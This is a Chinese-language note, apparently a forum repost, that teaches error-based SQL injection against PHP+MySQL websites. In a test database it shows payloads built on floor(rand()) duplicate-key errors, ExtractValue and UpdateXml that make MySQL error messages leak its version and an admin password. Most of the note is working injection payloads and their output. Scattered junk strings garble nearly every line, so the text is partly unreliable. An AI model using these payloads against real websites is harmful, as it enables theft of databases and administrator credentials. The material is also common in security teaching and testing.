放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。4 n* `! v' b+ B2 n
实际测试环境:1 N5 a+ [7 M' K' \
) Q5 W, Q5 T3 z# u* N. h1 n( I
3 O+ f; y+ e) U& Y6 c
mysql> show tables;
1 D# y3 _) Y$ ?+----------------+" R: L" @( m8 V$ j5 S- F
| Tables_in_test |
* d/ H/ l# \: E2 s+----------------+. d: k' |8 X7 B! o4 H F& t* _
| admin |) e. |1 |6 O& O. d& P
| article |$ G1 p) a2 R; _$ a
+----------------+
, v- K! d" m- [' X i1 E/ S+ A
; s% j3 u) c0 w 6 a+ j2 J5 w$ Y! e, o
6 Z% C5 c" `1 Z1 I* P& }
mysql> describe admin;
' _! {& X4 d) s, ~+-------+------------------+------+-----+---------+----------------+, S" Q4 _/ [/ {- g: [- f4 p
| Field | Type | Null | Key | Default | Extra |
, R" C: S1 N' Y; ~; a5 n& |+-------+------------------+------+-----+---------+----------------+
. s* N) Z0 Q6 U! Q x% L N| id | int(10) unsigned | NO | PRI | NULL | auto_increment |4 ?. w8 q1 N& f' x* F
| user | varchar(50) | NO | | NULL | |/ H) u% Z% p4 D0 _. R+ F5 |7 ^$ k
| pass | varchar(50) | NO | | NULL | |3 X* O. t5 Q, J/ v* E
+-------+------------------+------+-----+---------+----------------+
; w5 k: Z( I" h+ J3 E! a$ z( y& G) B& s 2 }4 M5 R# F6 g6 A% j% N
4 z0 K/ I2 M; l; p, b. ?
# Y- x( ^8 \! {$ z; `6 Gmysql> describe article;
) R4 M T/ S7 W- D6 H, c e# O+---------+------------------+------+-----+---------+----------------+
8 d6 b( K+ e6 e. U0 Y( z3 `9 \| Field | Type | Null | Key | Default | Extra |2 S/ }) W0 X, ^
+---------+------------------+------+-----+---------+----------------+
# ]/ X, J% S/ {6 w" ?% D7 u9 b; w| id | int(10) unsigned | NO | PRI | NULL | auto_increment |9 a/ v" r, V! W/ V: D" [
| title | varchar(50) | NO | | NULL | |
. C5 m6 r7 }4 s9 r8 ]" |7 ~| content | varchar(50) | NO | | NULL | |
7 ~& q* o1 r' P0 z0 O" E" r! ~+---------+------------------+------+-----+---------+----------------+
( V$ W) l0 W' H( b% ^1 n1、通过floor报错
8 |4 Z7 B% G/ i可以通过如下一些利用代码
* O0 s/ a; J; l# k$ f: t" e! F 9 g w# z g% E1 ^: X
1 q2 ], e$ v) G3 [" W% q3 F/ Xand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x! ^/ Y# x9 s5 K2 h
from information_schema.tables group by x)a);2 [* f s# ~5 J3 N% j, y+ t$ I
0 G) K2 A& v# T1 Z3 [/ i0 Q * A4 Z- q' E+ _ Q% ^3 V7 B
and (select count(*) from (select 1 union select null union select !1)x3 [$ B5 _0 ~0 k- `' n
group by concat((select table_name from information_schema.tables limit 1),- [6 y; |1 l0 F
floor(rand(0)*2)));
( M8 L6 T) E. f5 F举例如下: |1 M9 e3 p# ~4 t- I6 q
首先进行正常查询:& p: E9 o q+ T) q/ o0 b' ^
& R/ Q. C& c$ k4 i' w ^. rmysql> select * from article where id = 1;
, M$ _! N. F6 Q0 F+----+-------+---------+; T! K" m: {- h; B. [
| id | title | content |2 P$ n& t9 _: P7 D3 {+ {
+----+-------+---------+9 T/ s9 C' g# M/ Z
| 1 | test | do it |
) ~ F3 x' R) ?: r+----+-------+---------+( x- B7 o" z- e( b- W( W$ ]
假如id输入存在注入的话,可以通过如下语句进行报错。
4 L; r9 J2 E) f
0 _2 {" v' C% B9 p / I8 B4 V4 h$ y7 Z8 K) {. |6 {
mysql> select * from article where id = 1 and (select 1 from
( ^% S- b# B$ y1 V* g, }(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);5 g' w; ^3 i! Z5 w, B$ \
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'( e7 b+ |8 L6 {
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。, R! p$ J% L6 j; d- `- S: Z
例如我们需要查询管理员用户名和密码:+ g: H9 r- c$ G, T6 r
Method1:
" R, G0 D- T7 ?( }4 ` : p- g4 r/ `5 k& }
# F# P: N. \2 b. I6 B; amysql> select * from article where id = 1 and (select 1 from$ d) I- Y# [, I# J. B* z6 b
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x- ] o; }6 u5 I/ E/ s
from information_schema.tables group by x)a);
2 K R$ l. a2 R( p, N s X' k- WERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
- D. Q, n) N4 r$ VMethod2:: h8 q* _# A0 I1 s5 \
8 \7 c: F" M5 O1 ^ " s6 U! }1 Y; Q
mysql> select * from article where id = 1 and (select count(*)- C" r9 L; d$ |
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
7 A3 l6 c" j. f. w* Ifloor(rand(0)*2)));
3 X& T. E2 N3 g- a/ l; xERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'8 c( Q* _4 Q+ ]: E. Q. o! C3 S2 U% c; y
2、ExtractValue% x, L% \% F- X* w- s
测试语句如下8 b- j8 b2 \) o0 _( D$ ^
7 a+ U! q! t5 j5 x# z+ M/ l
, `3 U( ~# M+ [' wand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
. M1 b; e0 s6 [# H实际测试过程
4 P2 J$ D, o) ~1 J6 E9 r8 @" I1 d , K0 Q2 ?0 i+ x& Q- v# h1 s
* k! s; Q# x7 Y+ o6 Zmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
: O6 O7 B4 S% f' N Y% g(select pass from admin limit 1)));--
0 A# N7 I% ?1 j0 u' C4 wERROR 1105 (HY000): XPATH syntax error: '\admin888'3 C+ {0 l# d8 i- |
3、UpdateXml$ L# c) V) Y. n: ^. X S+ l
测试语句) L( \& \. C& O, N4 H' N. u3 _
. G9 k" [+ ?; H* g- Q 5 |1 j- @* L' y7 s/ a
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
* W2 \% i2 f, o, X2 o- z实际测试过程
8 q4 |2 g; G# J m+ c
2 B# C ]" M y- M- M
6 D% Z3 f5 U, E7 j9 k. G$ dmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24," J; b3 U/ \: e- b; C* v
(select pass from admin limit 1),0x5e24),1));
t# W' ?' Z( o/ n2 QERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
6 S' t8 G4 K( B& sAll, thanks foreign guys.
! ~" e) d; m, M7 P- G" B5 D5 P
! R5 \2 S( o& G9 u4 V4 I6 k$ W! D& \, w
|